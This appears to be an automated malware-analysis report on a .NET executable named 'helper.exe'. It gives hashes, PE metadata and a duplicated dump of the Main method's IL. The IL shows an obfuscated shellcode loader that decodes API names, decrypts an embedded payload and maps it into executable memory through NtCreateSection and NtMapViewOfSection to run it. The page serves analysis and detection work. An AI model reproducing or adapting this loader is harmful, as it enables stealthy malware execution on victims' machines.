93218f371953ac8fc557c49a7faf8bf0
PE Executable | MD5: 93218f371953ac8fc557c49a7faf8bf0 | Size: 14.85 KB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 93218f371953ac8fc557c49a7faf8bf0
|
| Sha1 | b0c3ee1835e693017e5951fe379141a35528b165
|
| Sha256 | 5d0232de29690795c3eb9c11a8d87db47827689da7223bc0ec9c5f181fbd1698
|
| Sha384 | c1eba05aa44f104ec2ea7e24b77905268ee3176dfb93967e11773542fd70313811ccde1b962d49b19d096fea7cb3732e
|
| Sha512 | 609152d2f13e1db4f3b30544405982d811ed44cb1d7fb3d9e073b059d408bdc9c6d54412ec76ecf2e9632435406dc4426d0e66bd72f1adc5ba2c4e5d637249ff
|
| SSDeep | 384:aFG/8zCo9fDmadKaJOFdjARSk80G3MeW0+fWNT8AN:XqCiLmrb0Zi8AN
|
| TLSH | 31622B0863C85231ED6F077518B20B58DE35F6070A4BEB2B28F9513E2E267589A533F9
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | helper.exe |
| Full Name | helper.exe |
| EntryPoint | System.Void TPirCkngEruQ::Main() |
| Scope Name | helper.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | helper |
| Assembly Version | 10.0.19041.1 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 4 |
| Main Method | System.Void TPirCkngEruQ::Main() |
| Main IL Instruction Count | 387 |
| Main IL | ldc.i4.3 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4 887 stloc.0 <null> ldc.i4 841 stloc.1 <null> call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldloc.2 <null> call System.DateTime System.DateTime::get_Today() call System.TimeSpan System.DateTime::op_Subtraction(System.DateTime,System.DateTime) stloc.3 <null> ldloca.s V_3 call System.Int64 System.TimeSpan::get_Ticks() pop <null> ldc.r8 0.440941663664273 stloc.s V_4 ldc.r8 0.428896797554985 stloc.s V_5 ldloc.s V_4 call System.Double System.Math::Sin(System.Double) pop <null> ldloc.s V_5 call System.Double System.Math::Cos(System.Double) pop <null> ldc.i4.0 <null> stloc.s V_6 ldc.i4.0 <null> stloc.s V_7 br.s IL_0070: ldloc.s V_7 ldloc.s V_6 ldloc.s V_7 add <null> stloc.s V_6 ldloc.s V_6 ldc.i4 3554 bgt.s IL_0076: ldc.r8 0.933508803105684 ldloc.s V_7 ldc.i4.1 <null> add <null> stloc.s V_7 ldloc.s V_7 ldc.i4.s 89 blt.s IL_005A: ldloc.s V_6 ldc.r8 0.933508803105684 stloc.s V_8 ldc.r8 0.751250349800685 stloc.s V_9 ldloc.s V_8 call System.Double System.Math::Sin(System.Double) pop <null> ldloc.s V_9 call System.Double System.Math::Cos(System.Double) pop <null> ldc.r8 0.690042160307077 stloc.s V_10 ldc.r8 0.135418318740753 stloc.s V_11 ldloc.s V_10 call System.Double System.Math::Sin(System.Double) pop <null> ldloc.s V_11 call System.Double System.Math::Cos(System.Double) pop <null> ldstr PATH call System.String System.Environment::GetEnvironmentVariable(System.String) stloc.s V_12 ldloc.s V_12 brfalse.s IL_00DB: ldstr "NtrQRjSLGj" ldloc.s V_12 callvirt System.String System.String::ToLower() stloc.s V_12 ldstr NtrQRjSLGj stloc.s V_13 ldloc.s V_13 callvirt System.String System.String::ToUpper() ldloc.s V_13 callvirt System.String System.String::ToLower() call System.String System.String::Concat(System.String,System.String) stloc.s V_13 ldloc.s V_13 callvirt System.Int32 System.String::get_Length() pop <null> call System.DateTime System.DateTime::get_Now() stloc.s V_14 ldloc.s V_14 call System.DateTime System.DateTime::get_Today() call System.TimeSpan System.DateTime::op_Subtraction(System.DateTime,System.DateTime) stloc.s V_15 ldloca.s V_15 call System.Int64 System.TimeSpan::get_Ticks() pop <null> ldc.i4.2 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldstr NGFHMLpuOK stloc.s V_16 ldloc.s V_16 callvirt System.String System.String::ToUpper() ldloc.s V_16 callvirt System.String System.String::ToLower() call System.String System.String::Concat(System.String,System.String) stloc.s V_16 ldloc.s V_16 callvirt System.Int32 System.String::get_Length() pop <null> ldstr l9Tm390elT stloc.s V_17 ldloc.s V_17 callvirt System.String System.String::ToUpper() ldloc.s V_17 callvirt System.String System.String::ToLower() call System.String System.String::Concat(System.String,System.String) stloc.s V_17 ldloc.s V_17 callvirt System.Int32 System.String::get_Length() pop <null> ldc.i4.s 12 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=12 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_18 ldc.i4.s 14 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=14 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_19 ldc.i4.s 20 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=20 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-3 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_20 ldc.i4.s 20 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=20 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-4 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_21 ldc.i4.5 <null> newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=5 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-5 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_22 ldloc.s V_18 ldc.i4.s 51 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_23 ldloc.s V_19 ldc.i4.s 12 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_24 ldloc.s V_20 ldc.i4.s 51 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_25 ldloc.s V_21 ldc.i4 140 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_26 ldloc.s V_22 ldc.i4 157 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_27 ldloc.s V_23 call System.IntPtr TPirCkngEruQ::GetModHandle(System.String) stloc.s V_28 ldloc.s V_28 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_0222: ldloc.s V_28 ret <null> ldloc.s V_28 ldloc.s V_24 call System.IntPtr TPirCkngEruQ::GetFunctionAddressByParsing(System.IntPtr,System.String) stloc.s V_29 ldloc.s V_29 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_023C: ldloc.s V_29 ret <null> ldloc.s V_29 ldtoken TPirCkngEruQ/jCVLiKhJJkZd call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/jCVLiKhJJkZd stloc.s V_30 ldloc.s V_30 ldloc.s V_28 ldloc.s V_25 callvirt System.IntPtr TPirCkngEruQ/jCVLiKhJJkZd::Invoke(System.IntPtr,System.String) stloc.s V_31 ldloc.s V_30 ldloc.s V_28 ldloc.s V_26 callvirt System.IntPtr TPirCkngEruQ/jCVLiKhJJkZd::Invoke(System.IntPtr,System.String) stloc.s V_32 ldloc.s V_30 ldloc.s V_28 ldloc.s V_27 callvirt System.IntPtr TPirCkngEruQ/jCVLiKhJJkZd::Invoke(System.IntPtr,System.String) stloc.s V_33 ldloc.s V_31 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brtrue.s IL_02A5: ret ldloc.s V_32 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brtrue.s IL_02A5: ret ldloc.s V_33 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_02A6: ldloc.s V_31 ret <null> ldloc.s V_31 ldtoken TPirCkngEruQ/VMuQnvFKwtKc call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/VMuQnvFKwtKc stloc.s V_34 ldloc.s V_32 ldtoken TPirCkngEruQ/ZcKRyZFVxrqO call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/ZcKRyZFVxrqO stloc.s V_35 ldloc.s V_33 ldtoken TPirCkngEruQ/PeuxcUMsMNVZ call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/PeuxcUMsMNVZ stloc.s V_36 ldc.i4 2464 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=2464 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-6 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_37 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=32 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-7 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_38 ldc.i4.s 16 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=16 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-8 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_39 ldloc.s V_38 ldc.i4.s 123 call System.Byte[] TPirCkngEruQ::ECiwGhNozviJ(System.Byte[],System.Byte) stloc.s V_40 ldloc.s V_39 ldc.i4.s 50 call System.Byte[] TPirCkngEruQ::ECiwGhNozviJ(System.Byte[],System.Byte) stloc.s V_41 ldloc.s V_37 ldloc.s V_40 ldloc.s V_41 call System.Byte[] TPirCkngEruQ::UUOLICAcvYgq(System.Byte[],System.Byte[],System.Byte[]) stloc.s V_42 ldsfld System.IntPtr System.IntPtr::Zero stloc.s V_43 ldloc.s V_42 ldlen <null> conv.i4 <null> conv.i8 <null> stloc.s V_44 ldloca.s V_43 ldc.i4 983071 ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_44 ldc.i4.s 64 ldc.i4 134217728 ldsfld System.IntPtr System.IntPtr::Zero call System.Int32 TPirCkngEruQ::NtCreateSection(System.IntPtr&,System.UInt32,System.IntPtr,System.Int64&,System.UInt32,System.UInt32,System.IntPtr) stloc.s V_45 ldloc.s V_45 brtrue.s IL_0391: ret ldloc.s V_43 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_0392: ldsfld System.IntPtr System.IntPtr::Zero ret <null> ldsfld System.IntPtr System.IntPtr::Zero stloc.s V_46 ldloc.s V_44 stloc.s V_47 ldc.i4.0 <null> conv.i8 <null> stloc.s V_48 ldloc.s V_43 ldc.i4.m1 <null> newobj System.Void System.IntPtr::.ctor(System.Int32) ldloca.s V_46 ldsfld System.IntPtr System.IntPtr::Zero ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_48 ldloca.s V_47 ldc.i4.1 <null> ldc.i4.0 <null> ldc.i4.4 <null> call System.Int32 TPirCkngEruQ::NtMapViewOfSection(System.IntPtr,System.IntPtr,System.IntPtr&,System.IntPtr,System.IntPtr,System.Int64&,System.Int64&,System.UInt32,System.UInt32,System.UInt32) stloc.s V_45 ldloc.s V_45 brtrue.s IL_03D5: ldloc.s V_43 ldloc.s V_46 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_03DE: ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_43 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ret <null> ldsfld System.IntPtr System.IntPtr::Zero stloc.s V_49 ldloc.s V_44 stloc.s V_47 ldc.i4.0 <null> conv.i8 <null> stloc.s V_48 ldloc.s V_43 ldc.i4.m1 <null> newobj System.Void System.IntPtr::.ctor(System.Int32) ldloca.s V_49 ldsfld System.IntPtr System.IntPtr::Zero ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_48 ldloca.s V_47 ldc.i4.1 <null> ldc.i4.0 <null> ldc.i4.s 32 call System.Int32 TPirCkngEruQ::NtMapViewOfSection(System.IntPtr,System.IntPtr,System.IntPtr&,System.IntPtr,System.IntPtr,System.Int64&,System.Int64&,System.UInt32,System.UInt32,System.UInt32) stloc.s V_45 ldloc.s V_45 brtrue.s IL_0422: ldloc.s V_43 ldloc.s V_49 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_042B: ldloc.s V_42 ldloc.s V_43 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ret <null> ldloc.s V_42 ldc.i4.0 <null> ldloc.s V_46 ldloc.s V_42 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldnull <null> ldftn System.Void TPirCkngEruQ::VmMhBptviFfe(System.IntPtr,System.IntPtr,System.IntPtr) newobj System.Void TPirCkngEruQ/AIUyAszQgsdc::.ctor(System.Object,System.IntPtr) stloc.s V_50 ldloc.s V_50 call System.IntPtr System.Runtime.InteropServices.Marshal::GetFunctionPointerForDelegate<TPirCkngEruQ/AIUyAszQgsdc>(TPirCkngEruQ/AIUyAszQgsdc) stloc.s V_51 ldloc.s V_34 ldloc.s V_51 ldloc.s V_49 ldsfld System.IntPtr System.IntPtr::Zero callvirt System.IntPtr TPirCkngEruQ/VMuQnvFKwtKc::Invoke(System.IntPtr,System.IntPtr,System.IntPtr) stloc.s V_52 ldloc.s V_52 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0483: ldloc.s V_52 ldloc.s V_35 ldloc.s V_52 callvirt System.Void TPirCkngEruQ/ZcKRyZFVxrqO::Invoke(System.IntPtr) ldloc.s V_36 ldc.i4.m1 <null> callvirt System.Void TPirCkngEruQ/PeuxcUMsMNVZ::Invoke(System.UInt32) br.s IL_0479: ldloc.s V_36 ldloc.s V_52 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ldloc.s V_43 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ret <null> |
| Module Name | helper.exe |
| Full Name | helper.exe |
| EntryPoint | System.Void TPirCkngEruQ::Main() |
| Scope Name | helper.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | helper |
| Assembly Version | 10.0.19041.1 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 4 |
| Main Method | System.Void TPirCkngEruQ::Main() |
| Main IL Instruction Count | 387 |
| Main IL | ldc.i4.3 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4 887 stloc.0 <null> ldc.i4 841 stloc.1 <null> call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldloc.2 <null> call System.DateTime System.DateTime::get_Today() call System.TimeSpan System.DateTime::op_Subtraction(System.DateTime,System.DateTime) stloc.3 <null> ldloca.s V_3 call System.Int64 System.TimeSpan::get_Ticks() pop <null> ldc.r8 0.440941663664273 stloc.s V_4 ldc.r8 0.428896797554985 stloc.s V_5 ldloc.s V_4 call System.Double System.Math::Sin(System.Double) pop <null> ldloc.s V_5 call System.Double System.Math::Cos(System.Double) pop <null> ldc.i4.0 <null> stloc.s V_6 ldc.i4.0 <null> stloc.s V_7 br.s IL_0070: ldloc.s V_7 ldloc.s V_6 ldloc.s V_7 add <null> stloc.s V_6 ldloc.s V_6 ldc.i4 3554 bgt.s IL_0076: ldc.r8 0.933508803105684 ldloc.s V_7 ldc.i4.1 <null> add <null> stloc.s V_7 ldloc.s V_7 ldc.i4.s 89 blt.s IL_005A: ldloc.s V_6 ldc.r8 0.933508803105684 stloc.s V_8 ldc.r8 0.751250349800685 stloc.s V_9 ldloc.s V_8 call System.Double System.Math::Sin(System.Double) pop <null> ldloc.s V_9 call System.Double System.Math::Cos(System.Double) pop <null> ldc.r8 0.690042160307077 stloc.s V_10 ldc.r8 0.135418318740753 stloc.s V_11 ldloc.s V_10 call System.Double System.Math::Sin(System.Double) pop <null> ldloc.s V_11 call System.Double System.Math::Cos(System.Double) pop <null> ldstr PATH call System.String System.Environment::GetEnvironmentVariable(System.String) stloc.s V_12 ldloc.s V_12 brfalse.s IL_00DB: ldstr "NtrQRjSLGj" ldloc.s V_12 callvirt System.String System.String::ToLower() stloc.s V_12 ldstr NtrQRjSLGj stloc.s V_13 ldloc.s V_13 callvirt System.String System.String::ToUpper() ldloc.s V_13 callvirt System.String System.String::ToLower() call System.String System.String::Concat(System.String,System.String) stloc.s V_13 ldloc.s V_13 callvirt System.Int32 System.String::get_Length() pop <null> call System.DateTime System.DateTime::get_Now() stloc.s V_14 ldloc.s V_14 call System.DateTime System.DateTime::get_Today() call System.TimeSpan System.DateTime::op_Subtraction(System.DateTime,System.DateTime) stloc.s V_15 ldloca.s V_15 call System.Int64 System.TimeSpan::get_Ticks() pop <null> ldc.i4.2 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldstr NGFHMLpuOK stloc.s V_16 ldloc.s V_16 callvirt System.String System.String::ToUpper() ldloc.s V_16 callvirt System.String System.String::ToLower() call System.String System.String::Concat(System.String,System.String) stloc.s V_16 ldloc.s V_16 callvirt System.Int32 System.String::get_Length() pop <null> ldstr l9Tm390elT stloc.s V_17 ldloc.s V_17 callvirt System.String System.String::ToUpper() ldloc.s V_17 callvirt System.String System.String::ToLower() call System.String System.String::Concat(System.String,System.String) stloc.s V_17 ldloc.s V_17 callvirt System.Int32 System.String::get_Length() pop <null> ldc.i4.s 12 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=12 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_18 ldc.i4.s 14 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=14 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_19 ldc.i4.s 20 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=20 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-3 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_20 ldc.i4.s 20 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=20 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-4 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_21 ldc.i4.5 <null> newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=5 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-5 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_22 ldloc.s V_18 ldc.i4.s 51 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_23 ldloc.s V_19 ldc.i4.s 12 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_24 ldloc.s V_20 ldc.i4.s 51 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_25 ldloc.s V_21 ldc.i4 140 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_26 ldloc.s V_22 ldc.i4 157 call System.String TPirCkngEruQ::XFxBTEpZJYDl(System.Byte[],System.Byte) stloc.s V_27 ldloc.s V_23 call System.IntPtr TPirCkngEruQ::GetModHandle(System.String) stloc.s V_28 ldloc.s V_28 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_0222: ldloc.s V_28 ret <null> ldloc.s V_28 ldloc.s V_24 call System.IntPtr TPirCkngEruQ::GetFunctionAddressByParsing(System.IntPtr,System.String) stloc.s V_29 ldloc.s V_29 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_023C: ldloc.s V_29 ret <null> ldloc.s V_29 ldtoken TPirCkngEruQ/jCVLiKhJJkZd call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/jCVLiKhJJkZd stloc.s V_30 ldloc.s V_30 ldloc.s V_28 ldloc.s V_25 callvirt System.IntPtr TPirCkngEruQ/jCVLiKhJJkZd::Invoke(System.IntPtr,System.String) stloc.s V_31 ldloc.s V_30 ldloc.s V_28 ldloc.s V_26 callvirt System.IntPtr TPirCkngEruQ/jCVLiKhJJkZd::Invoke(System.IntPtr,System.String) stloc.s V_32 ldloc.s V_30 ldloc.s V_28 ldloc.s V_27 callvirt System.IntPtr TPirCkngEruQ/jCVLiKhJJkZd::Invoke(System.IntPtr,System.String) stloc.s V_33 ldloc.s V_31 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brtrue.s IL_02A5: ret ldloc.s V_32 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brtrue.s IL_02A5: ret ldloc.s V_33 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_02A6: ldloc.s V_31 ret <null> ldloc.s V_31 ldtoken TPirCkngEruQ/VMuQnvFKwtKc call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/VMuQnvFKwtKc stloc.s V_34 ldloc.s V_32 ldtoken TPirCkngEruQ/ZcKRyZFVxrqO call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/ZcKRyZFVxrqO stloc.s V_35 ldloc.s V_33 ldtoken TPirCkngEruQ/PeuxcUMsMNVZ call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Delegate System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer(System.IntPtr,System.Type) isinst TPirCkngEruQ/PeuxcUMsMNVZ stloc.s V_36 ldc.i4 2464 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=2464 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-6 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_37 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=32 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-7 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_38 ldc.i4.s 16 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}/__StaticArrayInitTypeSize=16 <PrivateImplementationDetails>{6D7DBBD7-8115-4DED-B43F-2AD6AB1C01EB}::$$method0x600000a-8 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_39 ldloc.s V_38 ldc.i4.s 123 call System.Byte[] TPirCkngEruQ::ECiwGhNozviJ(System.Byte[],System.Byte) stloc.s V_40 ldloc.s V_39 ldc.i4.s 50 call System.Byte[] TPirCkngEruQ::ECiwGhNozviJ(System.Byte[],System.Byte) stloc.s V_41 ldloc.s V_37 ldloc.s V_40 ldloc.s V_41 call System.Byte[] TPirCkngEruQ::UUOLICAcvYgq(System.Byte[],System.Byte[],System.Byte[]) stloc.s V_42 ldsfld System.IntPtr System.IntPtr::Zero stloc.s V_43 ldloc.s V_42 ldlen <null> conv.i4 <null> conv.i8 <null> stloc.s V_44 ldloca.s V_43 ldc.i4 983071 ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_44 ldc.i4.s 64 ldc.i4 134217728 ldsfld System.IntPtr System.IntPtr::Zero call System.Int32 TPirCkngEruQ::NtCreateSection(System.IntPtr&,System.UInt32,System.IntPtr,System.Int64&,System.UInt32,System.UInt32,System.IntPtr) stloc.s V_45 ldloc.s V_45 brtrue.s IL_0391: ret ldloc.s V_43 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_0392: ldsfld System.IntPtr System.IntPtr::Zero ret <null> ldsfld System.IntPtr System.IntPtr::Zero stloc.s V_46 ldloc.s V_44 stloc.s V_47 ldc.i4.0 <null> conv.i8 <null> stloc.s V_48 ldloc.s V_43 ldc.i4.m1 <null> newobj System.Void System.IntPtr::.ctor(System.Int32) ldloca.s V_46 ldsfld System.IntPtr System.IntPtr::Zero ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_48 ldloca.s V_47 ldc.i4.1 <null> ldc.i4.0 <null> ldc.i4.4 <null> call System.Int32 TPirCkngEruQ::NtMapViewOfSection(System.IntPtr,System.IntPtr,System.IntPtr&,System.IntPtr,System.IntPtr,System.Int64&,System.Int64&,System.UInt32,System.UInt32,System.UInt32) stloc.s V_45 ldloc.s V_45 brtrue.s IL_03D5: ldloc.s V_43 ldloc.s V_46 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_03DE: ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_43 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ret <null> ldsfld System.IntPtr System.IntPtr::Zero stloc.s V_49 